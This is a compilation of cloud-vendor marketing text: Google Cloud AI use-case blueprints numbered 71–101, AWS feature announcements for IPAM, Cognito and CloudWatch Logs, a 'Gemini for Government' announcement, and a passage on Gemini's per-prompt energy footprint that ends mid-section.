71. Generate AI-powered video ad content
Business challenge: You’re an airline’s marketing team, and you need a constant stream of fresh video content to promote various destinations for in-flight entertainment and online ads. Your challenge is that traditional video production is expensive and time-consuming.
Tech stack: Google’s Veo, Vertex AI.
Blueprint: The marketing team identifies a destination to promote, for example, “Kyoto in autumn.” ➝ They use Gemini to brainstorm concepts and generate a script, with a prompt like, “Create a 30-second video script about the serene beauty of Kyoto’s temples during autumn.” ➝ This script, along with reference images and style guides, is then fed into Veo, Google’s generative video model. ➝ Veo generates a high-quality video clip based on the text and image prompts, allowing the team to create new, compelling ad content in a fraction of the time and cost of a traditional film shoot.
These architectural blueprints are inspired by customers who are using AI in the manufacturing, industrial and electronics industry, such as: Motorola, AES, Broadcom, COI Energy, Bayer Crop Science, and more.
72. Build a better, more responsive AI home companion robot
Business challenge: You’re a consumer electronics manufacturer looking to create a next-generation smart home product. Your challenge is moving beyond simple voice commands to create a truly helpful home companion that can understand natural conversation and interact intelligently with its environment.
Tech stack: Vertex AI, on-device AI models, Home API
Blueprint: The home robot (“Max”) uses on-device microphones to capture a user’s command via the Speech-to-Text API. ➝ The user’s request is sent to a Gemini model, which understands the conversational context and intent. ➝ If the request is to control a smart home device (e.g., “turn on the living room lights”), Gemini sends the appropriate command to the Google Home Platform APIs. ➝ Gemini generates a natural language response (e.g., “Okay, I’ve turned the lights on for you.”), which is converted to audio via the Text-to-Speech API and played through the robot’s speakers.
73. Create an AI-powered product recommendation agent
Business challenge: You’re a manufacturer of consumer products with a wide and varied catalog, like gardening supplies. Your challenge is that customers are often novices and don’t know which specific product is right for their needs, leading to confusion and lost sales.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Your entire product catalog, along with expert knowledge and guides, is indexed into Vertex AI Agent Builder from a source like BigQuery. ➝ A customer interacts with the AI agent on your website, asking, “My lawn has brown patches and I live in Texas. What should I do?” ➝ The agent understands the user’s intent and location. ➝ The retrieved product information and user query are sent to Gemini to generate a helpful, step-by-step answer, such as “It sounds like you have a grub problem, common in Texas this time of year. I recommend our product, and here’s how to apply it…”, guiding the customer to the correct purchase.
74. Automate industrial safety audits with AI
Business challenge: You’re a global energy or manufacturing company, and conducting safety audits across dozens of facilities is a slow, manual, and expensive process. Your challenge is to streamline these audits to ensure compliance and safety without incurring massive costs and operational downtime.
Tech stack: Vertex AI, Google Cloud Storage, a mobile application.
Blueprint: An auditor on-site uses a mobile app to take photos and videos of equipment, which are uploaded to Google Cloud Storage. ➝ Vertex AI Vision analyzes the imagery to identify equipment and check for visual compliance (e.g., “is the safety guard in place?”). ➝ The visual data, along with text from checklists, is fed to a Gemini model that has been trained on the company’s safety protocols. ➝ The model automatically generates a complete audit report, flagging non-compliant items and citing the specific safety rule, reducing a two-week process to one hour.
75. Automate sales quotes for configurable products
Business challenge: You’re a manufacturer of configurable products like solar panel systems. Your challenge is that creating an accurate quote is a slow, manual process requiring an expert to assess customer-specific variables (like roof size), which creates a bottleneck in your sales process.
Blueprint: A prospective customer provides their address. ➝ A service calls the Google Maps Aerial View API to get high-resolution imagery of the property’s roof. ➝ This imagery is analyzed by a Vertex AI model to measure the roof’s dimensions and identify obstructions. ➝ The system calculates the optimal number of solar panels and generates a quote. ➝ If the customer uploads a utility bill via Document AI, the system can even calculate potential savings, delivering a complete, accurate quote in 15 minutes instead of two hours.
76. Democratize data access with a natural language to SQL agent
Business challenge: You’re a large manufacturing enterprise with valuable data locked away in complex databases. Your challenge is that only a small number of technical employees can write SQL queries, creating a bottleneck and preventing business users from getting the insights they need.
Tech stack: BigQuery, Vertex AI, Looker or another BI tool.
Blueprint: All critical company data (e.g., SAP Materials data) is consolidated into BigQuery. ➝ An employee uses an internal BI tool and types a natural language question, such as “What was our total pulp production in Q2 for the southern region, and how does that compare to Q1?”. ➝ The question is sent to a Gemini model that has been trained on the company’s BigQuery schema. ➝ The model translates the natural language question into an accurate SQL query. ➝ The query is automatically run against BigQuery, and the results are returned and visualized for the employee, reducing query time.
77. Build an AI-powered agricultural insights platform
Business challenge: You’re a company in the agricultural science sector. Your challenge is helping farmers move from traditional farming methods to a more data-driven approach, enabling them to increase yields and operate more sustainably in the face of changing climate conditions.
Tech stack: BigQuery, Vertex AI, Google Earth Engine, IoT sensors.
Blueprint: Data from on-farm IoT sensors, satellite imagery from Google Earth Engine, and weather data are all consolidated into BigQuery. ➝ Vertex AI models analyze this multi-layered dataset to generate hyper-local insights for a specific field. ➝ A farmer receives a recommendation on their device, such as “Your soil moisture in Section B is 15% below optimal. Based on the 7-day forecast, I recommend irrigating with 1 inch of water tomorrow morning to maximize yield.”
78. Embed on-device AI for frontline worker efficiency
Business challenge: You’re a manufacturer of specialized hardware, like mobile computing devices for retail workers. You want to differentiate your product by providing intelligent, built-in features that help frontline workers make better, faster decisions on the job.
Tech stack: On-device AI models (e.g., Gemini Nano), Vertex AI, a device management platform.
Blueprint: A retail worker scans a shelf with their device. ➝ An on-device computer vision model recognizes the products and counts the inventory. ➝ The device compares the count to the store’s inventory data and identifies a low-stock item. ➝ A lightweight, on-device model generates an alert and a suggested action, such as “Only 2 units of ‘Product X’ left on the shelf. The backroom has 25. Suggest creating a restocking task.”, empowering the worker to prevent a stockout in the moment.
79. Forecast energy grid CO2 intensity with AI
Business challenge: You’re an energy transmission provider committed to sustainability. Your challenge is understanding and predicting the real-time carbon intensity of your electricity grid, which is necessary to optimize the use of renewables and reduce overall emissions.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time data on energy generation from all sources (solar, wind, gas, coal) is streamed into BigQuery. ➝ A Vertex AI forecasting model analyzes this data, along with weather forecasts, to predict the CO2 intensity of the grid for the next 24 hours. ➝ A service on Cloud Run exposes this forecast via an API. ➝ This allows the grid operator to make smarter decisions, like scheduling high-demand industrial processes for times when renewable energy is plentiful and CO2 intensity is lowest.
80. Identify and monetize underutilized energy capacity
Business challenge: You’re an energy services company focused on grid stability and social equity. Your challenge is identifying small pockets of underutilized energy capacity across thousands of commercial buildings that could be aggregated and redirected to benefit communities in need.
Blueprint: Data from IoT smart meters in commercial buildings is streamed into BigQuery. ➝ Vertex AI models analyze the energy consumption patterns of thousands of buildings to identify “underutilized capacity”—for example, an office building that consistently uses 20% less power on Friday afternoons. ➝ The system aggregates these small, distributed energy “assets.” ➝ This aggregated capacity can then be offered to utilities to stabilize the grid or provided as energy credits to low-income households, creating a new, equitable energy economy.
81. Automate customer onboarding in the energy sector
Business challenge: You’re an energy company, and signing up new customers is a manual process that involves processing documents like previous utility bills and personal IDs. Your challenge is to automate this workflow to make onboarding faster, reduce fraud, and improve the customer experience.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A new customer uploads a photo of their old utility bill and their driver’s license to your website. ➝ The files are sent to a service on Cloud Run, which uses Document AI to extract structured data from both documents. ➝ The service calls a Gemini Flash model with a prompt like, “Does the name and address on this utility bill match the name and address on this driver’s license?” ➝ Upon receiving a positive confirmation, the system automatically creates the new customer account, completing the onboarding and verification process in seconds.
These architectural blueprints are based on the incredible results customers in the public sector and nonprofits are seeing from using AI. Customers include Alma, Beyond 12, Bower, Climate Ride, Code Path, Pepperdine University and more.
82. Build a conversational coach for student success
Business challenge: You’re a nonprofit or educational institution focused on helping first-generation students from under-resourced communities succeed in college. Your challenge is providing personalized, scalable coaching that can address each student’s unique history and goals without making them feel compared to others.
Tech stack: Vertex AI, BigQuery, a student-facing mobile app.
Blueprint: A student’s academic history, goals, and previous interactions are stored in BigQuery. ➝ When the student interacts with the AI coach in their app, their query is sent to a service that retrieves their personal context from BigQuery. ➝ This history and the student’s question are sent to a Gemini model with a prompt like, “This student is feeling overwhelmed with their chemistry class. Based on their goal of becoming a nurse, provide an encouraging response and suggest two specific campus resources that can help.” ➝ The AI delivers a personalized, empathetic response, acting as a scalable mentor.
83. Create an AI assistant for legal aid and immigration
Business challenge: You’re a legal aid nonprofit. Your challenge is that clients are often overwhelmed by complex legal documents and don’t know what their next steps are, while your staff has limited bandwidth to provide one-on-one guidance for every query.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: An asylum seeker uses their phone to take a picture of a legal letter they received. ➝ The image is uploaded to a service on Cloud Run, which sends it to Document AI to extract all the text and key entities like dates and case numbers. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “Based on this legal notice, explain what it means in simple terms and list the top 3 most important next steps the recipient should take.” ➝ The app displays the simplified explanation and actionable guidance, empowering the user to navigate the complex legal process.
84. Develop an SMS chatbot for public benefits applications
Business challenge: You’re a government agency or nonprofit administering a public benefits program like SNAP. Your challenge is that the application process is often complex and confusing, creating a barrier for eligible individuals and families who need assistance.
Tech stack: Vertex AI, SMS API, a benefits eligibility database.
Blueprint: A person sends a text message like “FOOD” to a designated number. ➝ The SMS API receives the message and forwards it to a Vertex AI Conversation agent. ➝ The agent initiates a conversation, asking simple, conversational questions to determine eligibility (e.g., “How many people are in your household?”). ➝ Based on the user’s responses, the agent checks the eligibility database. ➝ The chatbot provides an immediate response, such as “Based on your answers, you are likely eligible for SNAP benefits. Would you like me to help you start the application?”, turning a multi-day process into minutes.
85. Create a digital case manager to assist social workers
Business challenge: You’re a nonprofit where caseworkers are responsible for large caseloads. Your challenge is that these workers spend dozens of hours per week on administrative tasks like writing action plans and summaries, taking time away from direct, high-impact work with beneficiaries.
Tech stack: Vertex AI, a case management system (e.g., Salesforce), Cloud Functions.
Blueprint: A caseworker finishes a meeting with a beneficiary. ➝ The notes from the meeting are saved in their case management system, which triggers a Cloud Function. ➝ The function retrieves the new notes along with the beneficiary’s entire case history. ➝ This information is sent to a Gemini model with a prompt like, “Based on this beneficiary’s history and the notes from today’s meeting, draft a detailed action plan for the next 30 days.” ➝ The AI-generated draft plan is automatically added to the case file, ready for the caseworker to review and approve, saving them hours of writing.
86. Accelerate grant writing for nonprofits
Business challenge: You’re a nonprofit that relies on grant funding to operate. Your challenge is that grant writing is a time-consuming, repetitive process that pulls your small team away from delivering on your core mission.
Tech stack: Gemini for Google Workspace.
Blueprint: A grant writer opens a Google Doc using a template for a new grant proposal. ➝ The template contains standard sections like “Organization History,” “Mission Statement,” and “Program Budget.” ➝ For a repetitive section, the writer uses the integrated Gemini feature with a prompt like, “Write a 200-word summary of our organization’s mission, based on our website and past proposals.” ➝ Gemini generates the text, filling in the routine information instantly. ➝ This allows the grant writer to focus their time and creativity on the unique, strategic parts of the proposal, cutting grant-writing time.
87. Build a platform to match talent with job opportunities
Business challenge: You’re a government agency or nonprofit focused on workforce development. Your challenge is connecting qualified candidates, especially those from non-traditional backgrounds, with relevant job opportunities in the private sector efficiently and at scale.
Tech stack: Vector Search, BigQuery, Cloud Run.
Blueprint: Job seekers and employers create profiles on the platform, and the data is stored in BigQuery. ➝ Candidate skills and job requirements are converted into vector embeddings and indexed in Vector Search . ➝ When a new job is posted, the system uses the Vector Search to find the top candidate profiles with the most similar embeddings. ➝ For each match, Gemini can be used to generate a personalized pitch, such as “This candidate seems like a strong fit for your ‘Software Engineer’ role because their project experience in ‘X’ aligns with your need for ‘Y’.”
88. Enhance government transparency with a citizen chatbot
Business challenge: You’re a local government or county office. Your challenge is providing residents with quick and accurate answers to their questions, as your small staff can get overwhelmed with calls, and information on your website can be hard to find.
Tech stack: Vertex AI Search, Cloud Run.
Blueprint: All public county documents, meeting minutes, and website pages are indexed into Vertex AI Search. ➝ A resident visits the county website and uses a chatbot to ask, “When is the next town hall meeting about the new park?” ➝ The query is sent to a service on Cloud Run, which passes it to Vertex AI Search. ➝ The system finds the relevant information from the indexed documents and provides a direct answer with a link to the source. ➝ This empowers residents with self-service access to information and frees up county staff.
89. Use AI to improve tax collection and auditing
Business challenge: You’re a municipal finance office responsible for tax collection. Your challenge is ensuring that tax classifications on invoices are correct, as manual audits can only cover a tiny fraction of submissions, leading to significant lost revenue from misclassifications.
Tech stack: Document AI, Vertex AI, BigQuery.
Blueprint: When a company submits an invoice, it is automatically processed by Document AI to extract the service descriptions and declared tax category. ➝ The extracted data is stored in BigQuery. ➝ A Vertex AI classification model, trained on historical data of correct and incorrect classifications, analyzes the service description from the new invoice. ➝ If the model predicts a different category than the one declared by the taxpayer (e.g., it classifies a “consulting” service as “software development,” which has a higher tax rate), the invoice is flagged for human review, improving accuracy and tax collection.
90. Detect and combat misinformation at scale
Business challenge: You’re a nonprofit fact-checking organization. Your challenge is the sheer volume of new information being published every second, making it impossible for your human fact-checkers to monitor everything and identify which claims need to be addressed most urgently.
Tech stack: Pub/Sub, Vertex AI, Cloud Functions.
Blueprint: A constant stream of content from news sites and social media APIs flows into Pub/Sub. ➝ A Cloud Function is triggered for each new piece of content. ➝ The content is sent to a Gemini model with a prompt like, “Analyze this news article. Identify any verifiable claims and check them against our database of known misinformation. Flag any new, rapidly-spreading, or potentially-harmful claims.” ➝ The system automatically filters out noise and surfaces a prioritized list of new, high-impact claims for human fact-checkers to investigate, allowing them to focus their efforts where it matters most.
91. Accelerate discovery of hidden objects
Business challenge: You’re a scientific institute. Your challenge is finding “hidden” objects like asteroids in massive astronomical datasets, a task that is like finding a needle in a haystack for human researchers.
Tech stack: BigQuery, Vertex AI, Google Cloud Storage.
Blueprint: Petabytes of astronomical image data from telescope surveys are stored in Google Cloud Storage and cataloged in BigQuery. ➝ A Vertex AI computer vision model is trained to recognize the faint, tell-tale signs of moving objects against the background of stars. ➝ The model is run on the entire historical dataset, analyzing images that have already been reviewed by humans. ➝ The AI flags potential new asteroid discoveries that were missed by previous methods, which are then presented to astronomers for verification, dramatically accelerating the rate of discovery.
These architectural blueprints are inspired by customers who are using AI in the technology industry, such as: Personal AI, Causal, Abstrakt, BMC, Snap, Augment, Box, Twilio, and more.
92. Build a personal AI that learns from your data
Business challenge: You’re a technology company aiming to create a truly personal AI assistant. Your challenge is moving beyond generic, one-size-fits-all models to create an AI that is trained exclusively on an individual’s own data, facts, and opinions, ensuring privacy and a perfectly tailored experience.
Tech stack: Vertex AI, Google Cloud Storage, Cloud Run.
Blueprint: A user uploads their personal data (documents, emails, notes) to a secure Google Cloud Storage bucket. ➝ A fine-tuning job is initiated on Vertex AI, training a baseline Gemini model exclusively on this personal data corpus. ➝ The resulting “personal language model” is deployed to a secure endpoint on Cloud Run. ➝ When the user interacts with their personal AI, their queries are sent only to their own custom model, allowing it to provide responses that reflect their unique knowledge, style, and memory.
93. Create an AI-powered financial planning wizard
Business challenge: You’re a fintech company providing financial planning software for startups. Your challenge is that new users often struggle with the initial setup, which requires connecting disparate data sources and building complex financial models from scratch.
Tech stack: Vertex AI, BigQuery, connections to third-party data source APIs.
Blueprint: A new user signs up and grants access to their financial data sources (e.g., accounting software, bank accounts). ➝ An AI wizard ingests the data into BigQuery. ➝ The wizard sends the consolidated data to Gemini with a prompt like, “Analyze this company’s financial data. Identify key revenue streams, cost centers, and growth patterns, then generate a standard three-statement financial model.” ➝ Gemini generates the baseline model, which is then presented to the user, turning a multi-hour setup process into minutes.
94. Develop a sales co-pilot to help B2B sellers
Business challenge: You’re a B2B sales technology company. Your challenge is helping sales representatives navigate complex organizational data to find the right insights to close deals, a process that often involves manually sifting through CRM data, past deals, and product documentation.
Tech stack: Vertex AI, BigQuery, CRM integration.
Blueprint: All of a company’s sales data—CRM records, past deals, and product information—is consolidated in BigQuery and indexed into Vertex AI Search. ➝ A salesperson preparing for a call uses a co-pilot and asks, “I’m about to call a prospect in the manufacturing industry. Give me key talking points, relevant case studies, and potential objections.” ➝ The co-pilot uses Vertex AI Search to find the most relevant information. ➝ Gemini synthesizes this data into a concise briefing document, empowering the salesperson to have a more strategic and effective conversation.
95. Build an AI agent to transcribe and analyze meetings
Business challenge: You’re a collaboration software company. Valuable information shared in voice conversations and video meetings is often lost or requires hours of manual work to transcribe and summarize for those who couldn’t attend.
Tech stack: Speech-to-Text API, Vertex AI, Cloud Run functions.
Blueprint: A user connects the AI agent to their calendar. ➝ When a meeting starts, the agent joins the call and records the audio. ➝ After the meeting, a Cloud Run function sends the audio file to the Speech-to-Text API for a full transcription. ➝ The transcript is then sent to Gemini with a prompt like, “Summarize this meeting transcript, identify all action items and assign them to the correct person, and list the key decisions that were made.” ➝ The structured summary and action items are then emailed to all attendees, saving time and improving collaboration.
96. Create an enterprise search engine for workplace knowledge
Business challenge: You’re a company whose employees use dozens of different applications (like Slack, Google Drive, Salesforce, Confluence). Your challenge is that valuable company knowledge is fragmented across these silos, making it nearly impossible for employees to find the information they need to do their jobs effectively.
Tech stack: Vertex AI Search, connectors to various enterprise applications.
Blueprint: Secure connectors are used to index all of a company’s data from its various workplace apps into Vertex AI Search, respecting all existing user permissions. ➝ An employee uses a single search bar and asks a question like, “What was our Q3 marketing strategy for the new product launch?” ➝ Vertex AI Search queries across all connected data sources—finding the strategy document in Google Drive, the related conversations in Slack, and the campaign results in Salesforce. ➝ It returns a unified, synthesized answer with links to the original sources, allowing employees to find information.
97. Deploy video intelligence agents for any CCTV camera
Business challenge: You’re a business with hundreds of CCTV cameras for security. Your challenge is that these cameras generate thousands of hours of passive video footage that is only reviewed after an incident occurs, providing no proactive operational or business insights.
Tech stack: Vertex AI, Cloud Storage, a mobile alerting system.
Blueprint: Live video feeds from CCTV cameras are streamed to Google Cloud Storage. ➝ A multimodal Gemini model, acting as a “video intelligence agent,” continuously monitors the feeds. ➝ The agent is given specific tasks via natural language prompts, such as “Monitor the store entrance and send an alert if more than 10 people are waiting in line for over 5 minutes,” or “Alert security if anyone enters the warehouse after 10 PM.” ➝ When the AI agent detects a specified event, it automatically sends a real-time alert with a video clip to the relevant personnel’s mobile device.
98. Build an agent for B2B workflow automation
Business challenge: You’re a B2B technology company, and you recognize that your clients in different departments (e.g., sales, HR, finance) have unique, complex workflows that are difficult to automate with one-size-fits-all software.
Tech stack: Vertex AI, various third-party API connectors.
Blueprint: A platform provides a framework for building specialized AI agents. ➝ A company can create an “HR Onboarding Agent” and give it access to their HR systems. ➝ When a new employee is hired, the agent automatically executes a multi-step workflow: it creates their user account, assigns required training, and schedules orientation meetings. ➝ The agent uses Gemini to orchestrate these tasks by calling the appropriate APIs for each system, automating a complex cross-departmental workflow that would otherwise require significant manual coordination.
99. Transform customer feedback into product insights
Business challenge: You’re a product development company, and you need to understand how customers feel about your product, but their feedback is scattered across support tickets, app store reviews, and social media. Manually analyzing this unstructured text is a massive challenge.
Tech stack: Vertex AI, BigQuery, data ingestion tools (e.g., Pub/Sub).
Blueprint: All customer feedback streams from various sources into BigQuery. ➝ A scheduled job sends batches of new feedback to a Gemini model. ➝ The model is given a prompt like, “Analyze this feedback. Categorize each comment by topic (e.g., ‘UI/UX’, ‘Pricing’, ‘Bug Report’), determine the sentiment (Positive, Negative, Neutral), and extract any feature requests.” ➝ The structured, analyzed data is written back to BigQuery. ➝ Product managers can now use a simple dashboard to see trends, like “There was a 30% increase in negative comments about ‘login issues’ this week,” allowing them to take data-driven action.
100. Automate the creative process in marketing campaigns
Business challenge: You’re a digital marketing platform, and your clients need to create a high volume of ads for different products and channels. Your challenge is automating the creative process so they can launch effective campaigns without needing a large design team.
Blueprint: A user provides a few key details about their product and a target audience. ➝ This information is sent to a service on Cloud Run, which constructs a prompt for Gemini like, “Generate three different ad headlines and a short script for a 15-second video ad for a new running shoe targeting marathon runners.” ➝ Gemini generates the text. ➝ The service then sends the script to the Text-to-Speech API to create a voiceover. ➝ The text and voiceover are then combined with product images using a template, automatically generating multiple ad variations that are ready to be deployed.
101. Provide an AI observability platform for LLM evaluation
Business challenge: You’re an enterprise that is deploying multiple AI applications, but you lack the tools to monitor, troubleshoot, and evaluate their performance in production. Your challenge is ensuring these AI systems are accurate, safe, and effective once they are live.
Tech stack: Google Kubernetes Engine (GKE), BigQuery, Vertex AI.
Blueprint: An enterprise’s AI applications send their inputs, outputs, and model telemetry data to an observability platform running on GKE. ➝ This data is processed and stored in BigQuery for large-scale analysis. ➝ The platform uses Vertex AI models to automatically detect issues like “model drift” (when a model’s performance degrades over time) or “hallucinations” (when an LLM generates incorrect information). ➝ When an issue is detected, the platform sends an alert to the development team via a dashboard, allowing them to quickly diagnose and fix problems with their production AI systems.
Today, Amazon Web Services announced improved Amazon CloudWatch alarm integration for Amazon VPC IP Address Manager (IPAM). This enhancement provides better visibility and management of existing CloudWatch alarms directly from the IPAM console. With this new integration, you can quickly identify potential IP address management issues and take proactive actions across your organization.
The enhanced integration brings IPAM-related CloudWatch alarms directly into the IPAM console, providing a unified view of alarm states across all IPAM pages. This visibility enables quick response to potential IP address management issues. You can now create CloudWatch alarms directly from the IPAM console – clicking the ‘Create Alarm’ option redirects you to CloudWatch with relevant fields pre-populated, streamlining IP usage alert setup. A new resource-level “Alarms” tab offers comprehensive visibility into all alarms associated with specific IPAM resources, making it easier to manage and monitor your IP address space effectively.
This improved integration is particularly valuable for networking teams managing IP address spaces, as it helps prevent issues through better visibility and easier management of existing alarms. The console also provides proactive monitoring suggestions for resources without associated alarms, helping ensure comprehensive monitoring coverage across your IP address management infrastructure.
This feature is now available in all AWS Regions where Amazon VPC IPAM is supported, including AWS China Regions, and AWS GovCloud (US) Regions.
Amazon Cognito now allows you to configure terms of use and privacy policy documents for Managed Login pages. This helps customers seamlessly present legal terms during user registration while simplifying implementation. With Managed Login, Cognito customers could previously use its no-code editor to customize the user journey from signup and login to password recovery and multi-factor authentication. Now, customers can additionally use Managed Login to easily set up terms of use and privacy policy documents, saving development teams from building custom solutions.
With this capability, you can configure terms of use and privacy policy URLs for each app client in your Cognito user pool. When users register, they see text indicating that by signing up, they agree to your terms of use and privacy policy, and a link to your webpage with the agreement. You can configure different URLs for each supported language to match your Managed Login localization settings. For example, if you have configured the privacy policy and terms of use documents for French (fr) and the same is selected in the lang query-parameter on the sign-up page URL, users will see the French URL you configured.
This capability is available to Amazon Cognito customers using the Essentials or Plus tiers in AWS Regions where Cognito is available, including the AWS GovCloud (US) Regions. To learn more, refer to the developer guide and Pricing Detail Page for Cognito Essentials and Plus tier.
Amazon CloudWatch Logs Insights expands natural language query result summarization to 15 additional AWS Regions: Asia Pacific (Hong Kong, Malaysia, Mumbai, Thailand, Tokyo, Singapore, Sydney), Europe (Frankfurt, Ireland, London, Spain, Stockholm), South America (Sao Paulo). US East (Ohio), and US West (Oregon).
CloudWatch Logs Insights lets you interactively search and analyze your logs with Logs Insights query language, OpenSearch Service Piped Processing Language (PPL), and OpenSearch Service Structured Query Language (SQL). The query result summarization capability generates a natural language summary of the query results, providing users with clear, actionable insights. Interpreting log entries can be time-consuming and this feature transforms complex query results into concise summaries that help you quickly identify issues and gain actionable insights from your log data.
In addition, natural language query generation capability in CloudWatch Logs is now available for CloudWatch Logs Insights and Metrics Insights in 6 additional AWS Regions: Asia Pacific (Malaysia, Mumbai, Thailand), Europe (London, Spain), and South America (Sao Paulo). Query generation for PPL and SQL languages is available in 3 additional AWS Regions: Asia Pacific (Mumbai), Europe (London), and South America (Sao Paulo). Natural language query generation powered by generative AI allows users to use plain English to quickly generate queries in the context of their logs without needing extensive knowledge of the query language, reducing time to gather insights.
To learn about the log summarizer in CloudWatch Logs Insights, visit the Amazon CloudWatch Logs documentation. To learn about natural language query generation, go to CloudWatch Logs documentation.
Google is proud to support the U.S. government in its modernization efforts through the use of AI. Today, in partnership with the General Services Administration (GSA) and in support of the next phase of the GSA’s OneGov Strategy and President Trump’s AI Action Plan, we’re thrilled to announce a new, comprehensive ‘Gemini for Government’ offering.
Building on the well-received Google Workspace discount we announced for government agencies earlier this year, ‘Gemini for Government’ brings together the best of Google’s AI-optimized and accredited commercial cloud, industry-leading Gemini models, and agentic solutions to support the missions of government agencies like never-before. While many AI models have been offered to the government, the ‘Gemini for Government’ offering is a complete AI platform – including Google-quality enterprise search, video and image generation capabilities, the popular NotebookLM AI tool, out-of-the-box AI agents for Deep Research and Idea Generation, and the ability for employees to create their own AI agents. Priced at less than $0.50 per government agency for a year, this comprehensive package enables U.S. government employees to access Google’s leading AI offerings at very little cost.
GSA appreciates Google’s partnership and we’re excited to add the comprehensive ‘Gemini for Government’ AI solution to OneGov,” said Federal Acquisition Service Commissioner Josh Gruenbaum. “GSA is delivering on the President’s AI Action Plan and helping agencies access powerful American AI tools to optimize daily workflows and create a more efficient, responsive, and effective government for American taxpayers. Critically, this offering will provide partner agencies with vital flexibility in GSA’s marketplace, ensuring they have the options needed to sustain a strong and resilient procurement ecosystem.
Josh Gruenbaum
Federal Acquisition Service Commissioner
‘Gemini for Government’ includes FedRAMP High-authorized security and compliance features. (For a complete list of Google’s FedRAMP authorized services, visit ‘Google Services’ on the FedRAMP Marketplace.) ‘Gemini for Government’ is a seamlessly integrated solution designed from the ground up for AI, and is built upon three pillars:
An enterprise platform with choice and control
‘Gemini for Government’ brings the best of commercial innovation to the government with an AI Agent Gallery; agent-to-agent communication protocols; connectors into enterprise data sets; pre-built AI agents; and an open platform that enables agencies to choose the right agents for their users – whether built by Google, third-parties, or government agencies themselves. Being able to launch and monitor agentic use cases through ‘Gemini for Government’ gives agencies flexibility and control. They can closely manage and scale agency-wide agent adoption with user access controls, AI agent provisioning, and multi-agent coordination. ‘Gemini for Government’ also pairs with Google Cloud’s Vertex AI platform, which allows agencies to tune or ground their own models as well.
2. Super-powered security, built-in
Every day, Google protects billions of customer devices, collects frontline cyber threat intelligence, and provides industry-leading cyber incident response to entities around the world. This wealth of expertise underpins the security protection integrated into all of our products. As part of the ‘Gemini for Government’ offering, agencies also receive built-in Advanced Security features, including Identity & Access Management, basic threat protection, AI threat protection, data privacy, SOC2 Type 2 compliance, advanced compliance (with Sec4, FedRAMP), and more. Agencies also have the option of deploying additional Google security solutions at discounted government pricing – and these solutions seamlessly integrate with various third-party security solutions and security stacks, allowing organizations to maximize the value of their investments.
3. A true transformation partner
By working with the GSA under its OneGov Strategy, Google ensures that government agencies will find ‘Gemini for Government’ easy to implement and use. Our offering is aligned with how government procurement works – today and into the future – and includes transparent pricing and a predictable path to realizing value, helping agencies future-proof their AI investments. Of course, Google’s commitment to the government extends far beyond providing cutting-edge AI solutions. We are a long-term, strategic partner for America, deeply invested in the mission, innovation, and security of our government.
We’re excited to embark on this journey with the public sector, working hand-in-hand with the GSA to realize the full potential of OneGov through our ‘Gemini for Government’ offering. Together, we can help to scale innovation, drive efficiency, and create a more secure – and prosperous – future for our nation. Agencies ready to learn more about this offering should reach out to the National Customer Service Center at ITCSC@gsa.gov or Google Public Sector at geminiforgov@google.com.
AI is unlocking scientific breakthroughs, improving healthcare and education, and could add trillions to the global economy. Understanding AI’s footprint is crucial, yet thorough data on the energy and environmental impact of AI inference — the use of a trained AI model to make predictions or generate text or images — has been limited. As more users use AI systems, the importance of inference efficiency rises.
That’s why we’re releasing a technical paper detailing our comprehensive methodology for measuring the energy, emissions, and water impact of Gemini prompts. Using this methodology, we estimate the median Gemini Apps text prompt uses 0.24 watt-hours (Wh) of energy, emits 0.03 grams of carbon dioxide equivalent (gCO2e), and consumes 0.26 milliliters (or about five drops) of water1 — figures that are substantially lower than many public estimates. The per-prompt energy impact is equivalent to watching TV for less than nine seconds.
At the same time, our AI systems are becoming more efficient through research innovations and software and hardware efficiency improvements. For example, over a recent 12 month period, the energy and total carbon footprint of the median Gemini Apps text prompt dropped by 33x and 44x, respectively, all while delivering higher quality responses. These results are built on our latest data center energy emissions reductions and our work to advance carbon-free energy and water replenishment. While we’re proud of the innovation behind our efficiency gains so far, we’re committed to continuing substantial improvements. Here’s a closer look at these ongoing efforts.
Calculating the environmental footprint of AI at Google
Detailed measurement lets us compare across different AI models, and the hardware and energy they run on, while enabling system-wide efficiency optimizations — from hardware and data centers to the models themselves. By sharing our methodology, we hope to increase industry-wide consistency in calculating AI’s resource consumption and efficiency.
Measuring the footprint of AI serving workloads isn’t simple. We developed a comprehensive approach that considers the realities of serving AI at Google’s scale, which include:
Full system dynamic power: This includes not just the energy and water used by the primary AI model during active computation, but also the actual achieved chip utilization at production scale, which can be much lower than theoretical maximums.
Idle machines: To ensure high availability and reliability, production systems require a degree of provisioned capacity that is idle but ready to handle traffic spikes or failover at any given moment. The energy consumed by these idle chips must be factored into the total energy footprint.
CPU and RAM: AI model execution doesn’t happen solely in ML accelerators like TPUs and GPUs. The host CPU and RAM also play a crucial role in serving AI, and use energy.
Data center overhead: The energy consumed by the IT equipment running AI workloads is only part of the story. The infrastructure supporting these computations — cooling systems, power distribution, and other data center overhead — also consumes energy. Overhead energy efficiency is measured by a metric called Power Usage Effectiveness (PUE).
Data center water consumption: To reduce energy consumption and associated emissions, data centers often consume water for cooling. As we optimize our AI systems to be more energy-efficient, this naturally decreases their overall water consumption as well.
Many current AI energy consumption calculations only include active machine consumption, overlooking several of the critical factors discussed above. As a result, they represent theoretical efficiency instead of true operating efficiency at scale. When we apply this non-comprehensive methodology that only considers active TPU and GPU consumption, we estimate the median Gemini text prompt uses 0.10 Wh of energy, emits 0.02 gCO2e, and consumes 0.12 mL of water. This is an optimistic scenario at best and substantially underestimates the real operational footprint of AI.
Our comprehensive methodology’s estimates (0.24 Wh of energy, 0.03 gCO2e, 0.26 mL of water) account for all critical elements of serving AI globally. We believe this is the most complete view of AI’s overall footprint.
Our full-stack approach to AI — and AI efficiency
Gemini’s dramatic efficiency gains stem from Google’s full-stack approach to AI development — from custom hardware and highly efficient models, to the robust serving systems that make these models possible. We’ve built efficiency into every layer of AI, including:
More efficient model architectures: Gemini models are built on the Transformer model architecture developed by Google researchers, which provide a 10-100x efficiency boost over the previous state-of-the-art architectures for language modeling. We design models with inherently efficient structures like Mixture-of-Experts (MoE) and hybrid reasoning. MoE models, for example, allow us to activate a small subset of a large model specifically required to respond to a query, reducing computations and data transfer by a factor of 10-100x.
